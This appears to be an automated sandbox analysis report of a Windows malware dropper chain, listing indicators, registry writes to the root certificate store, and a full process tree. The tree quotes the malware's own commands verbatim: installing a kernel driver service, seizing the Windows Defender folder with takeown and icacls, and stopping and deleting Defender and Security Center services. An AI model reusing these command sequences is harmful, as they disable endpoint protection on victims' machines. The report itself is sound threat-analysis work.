Modifies system certificate store 2 TTPs 4 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 524 schtasks.exe 2608 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1568 22.exe -
Suspicious behavior: EnumeratesProcesses 43 IoCs
pid Process 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 1016 rapes.exe 2656 Or1ARiR.exe 2028 Rm3cVPI.exe 2028 Rm3cVPI.exe 2028 Rm3cVPI.exe 2028 Rm3cVPI.exe 2656 Or1ARiR.exe 2656 Or1ARiR.exe 2656 Or1ARiR.exe 2656 Or1ARiR.exe 392 powershell.exe 296 Bell_Setup16.tmp 296 Bell_Setup16.tmp 2320 powershell.exe 2320 powershell.exe 2320 powershell.exe 2716 TempLIDEUZQB3G3F7ZVBBO8EBBEQRQYSTTUF.EXE 1004 powershell.exe 2156 powershell.exe 2380 0b8eec4302.exe 1348 powershell.exe 2616 powershell.exe 2052 ef03f308e2.exe 2616 powershell.exe 2616 powershell.exe 2660 483d2fa8a0d53818306efeb32d3.exe 2380 0b8eec4302.exe 2380 0b8eec4302.exe 2380 0b8eec4302.exe 2380 0b8eec4302.exe 2052 ef03f308e2.exe 2052 ef03f308e2.exe 2052 ef03f308e2.exe 2052 ef03f308e2.exe 2832 425b117859.exe 2604 436e1cc62f.exe 2376 56d42e9071.exe 760 ba43420fc1.exe 1096 b801a9df2a.exe 2376 56d42e9071.exe 760 ba43420fc1.exe 760 ba43420fc1.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 464 Process not Found 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 1348 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1700 taskkill.exe Token: SeDebugPrivilege 2916 taskkill.exe Token: SeDebugPrivilege 1676 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 1120 firefox.exe Token: SeDebugPrivilege 1120 firefox.exe Token: SeDebugPrivilege 760 ba43420fc1.exe Token: SeDebugPrivilege 3256 tasklist.exe Token: SeDebugPrivilege 3472 tasklist.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
pid Process 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 2644 amnew.exe 1956 38eb6df4e0.exe 1956 38eb6df4e0.exe 1956 38eb6df4e0.exe 296 Bell_Setup16.tmp 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 1120 firefox.exe 1120 firefox.exe 1120 firefox.exe 1120 firefox.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 1956 38eb6df4e0.exe 1956 38eb6df4e0.exe 1956 38eb6df4e0.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 2376 56d42e9071.exe 1120 firefox.exe 1120 firefox.exe 1120 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1684 wrote to memory of 1016 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 30 PID 1684 wrote to memory of 1016 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 30 PID 1684 wrote to memory of 1016 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 30 PID 1684 wrote to memory of 1016 1684 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe 30 PID 1016 wrote to memory of 1976 1016 rapes.exe 32 PID 1016 wrote to memory of 1976 1016 rapes.exe 32 PID 1016 wrote to memory of 1976 1016 rapes.exe 32 PID 1016 wrote to memory of 1976 1016 rapes.exe 32 PID 1976 wrote to memory of 3016 1976 EPTwCQd.exe 33 PID 1976 wrote to memory of 3016 1976 EPTwCQd.exe 33 PID 1976 wrote to memory of 3016 1976 EPTwCQd.exe 33 PID 1016 wrote to memory of 2028 1016 rapes.exe 34 PID 1016 wrote to memory of 2028 1016 rapes.exe 34 PID 1016 wrote to memory of 2028 1016 rapes.exe 34 PID 1016 wrote to memory of 2028 1016 rapes.exe 34 PID 1016 wrote to memory of 2656 1016 rapes.exe 35 PID 1016 wrote to memory of 2656 1016 rapes.exe 35 PID 1016 wrote to memory of 2656 1016 rapes.exe 35 PID 1016 wrote to memory of 2656 1016 rapes.exe 35 PID 1016 wrote to memory of 956 1016 rapes.exe 37 PID 1016 wrote to memory of 956 1016 rapes.exe 37 PID 1016 wrote to memory of 956 1016 rapes.exe 37 PID 1016 wrote to memory of 956 1016 rapes.exe 37 PID 956 wrote to memory of 1824 956 xZRvIQ5.exe 38 PID 956 wrote to memory of 1824 956 xZRvIQ5.exe 38 PID 956 wrote to memory of 1824 956 xZRvIQ5.exe 38 PID 1016 wrote to memory of 392 1016 rapes.exe 39 PID 1016 wrote to memory of 392 1016 rapes.exe 39 PID 1016 wrote to memory of 392 1016 rapes.exe 39 PID 1016 wrote to memory of 392 1016 rapes.exe 39 PID 1016 wrote to memory of 2644 1016 rapes.exe 41 PID 1016 wrote to memory of 2644 1016 rapes.exe 41 PID 1016 wrote to memory of 2644 1016 rapes.exe 41 PID 1016 wrote to memory of 2644 1016 rapes.exe 41 PID 2644 wrote to memory of 2208 2644 amnew.exe 42 PID 2644 wrote to memory of 2208 2644 amnew.exe 42 PID 2644 wrote to memory of 2208 2644 amnew.exe 42 PID 2644 wrote to memory of 2208 2644 amnew.exe 42 PID 2208 wrote to memory of 2112 2208 futors.exe 44 PID 2208 wrote to memory of 2112 2208 futors.exe 44 PID 2208 wrote to memory of 2112 2208 futors.exe 44 PID 2208 wrote to memory of 2112 2208 futors.exe 44 PID 2112 wrote to memory of 940 2112 gron12321.exe 46 PID 2112 wrote to memory of 940 2112 gron12321.exe 46 PID 2112 wrote to memory of 940 2112 gron12321.exe 46 PID 2208 wrote to memory of 3024 2208 futors.exe 47 PID 2208 wrote to memory of 3024 2208 futors.exe 47 PID 2208 wrote to memory of 3024 2208 futors.exe 47 PID 2208 wrote to memory of 3024 2208 futors.exe 47 PID 3024 wrote to memory of 1332 3024 v7942.exe 49 PID 3024 wrote to memory of 1332 3024 v7942.exe 49 PID 3024 wrote to memory of 1332 3024 v7942.exe 49 PID 1016 wrote to memory of 2020 1016 rapes.exe 50 PID 1016 wrote to memory of 2020 1016 rapes.exe 50 PID 1016 wrote to memory of 2020 1016 rapes.exe 50 PID 1016 wrote to memory of 2020 1016 rapes.exe 50 PID 2208 wrote to memory of 1708 2208 futors.exe 51 PID 2208 wrote to memory of 1708 2208 futors.exe 51 PID 2208 wrote to memory of 1708 2208 futors.exe 51 PID 2208 wrote to memory of 1708 2208 futors.exe 51 PID 1708 wrote to memory of 2476 1708 alex1dskfmdsf.exe 53 PID 1708 wrote to memory of 2476 1708 alex1dskfmdsf.exe 53 PID 1708 wrote to memory of 2476 1708 alex1dskfmdsf.exe 53 PID 1016 wrote to memory of 960 1016 rapes.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1976 -s 284⤵
- Loads dropped DLL
PID:3016
-
-
-
C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe"C:\Users\Admin\AppData\Local\Temp\10359310101\Or1ARiR.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"C:\Users\Admin\AppData\Local\Temp\10359660101\xZRvIQ5.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 956 -s 284⤵
- Loads dropped DLL
PID:1824
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10359820261\martin\'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10360100101\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2112 -s 366⤵
- Loads dropped DLL
PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3024 -s 366⤵
- Loads dropped DLL
PID:1332
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1708 -s 366⤵
- Loads dropped DLL
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\is-SLNK0.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-SLNK0.tmp\Bell_Setup16.tmp" /SL5="$C0200,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\is-GS8OJ.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-GS8OJ.tmp\Bell_Setup16.tmp" /SL5="$D0200,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:296 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"9⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2300
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"5⤵
- Executes dropped EXE
PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"5⤵
- Executes dropped EXE
PID:1172 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1172 -s 286⤵
- Loads dropped DLL
PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe"C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043050101\436e1cc62f.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe"C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10043060101\b801a9df2a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3552
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10360180101\bot.exe"3⤵
- Executes dropped EXE
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:960 -
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:620 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E540.tmp\E541.tmp\E5B0.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1568 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E714.tmp\E715.tmp\E716.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵
- Drops file in Program Files directory
PID:108 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1680
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2376
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:800
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1716
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2544
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:2824
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:1288
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:2392
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:2680
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:1004
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:2132
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:2988
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:3020
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:2764
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵PID:2480
-
-
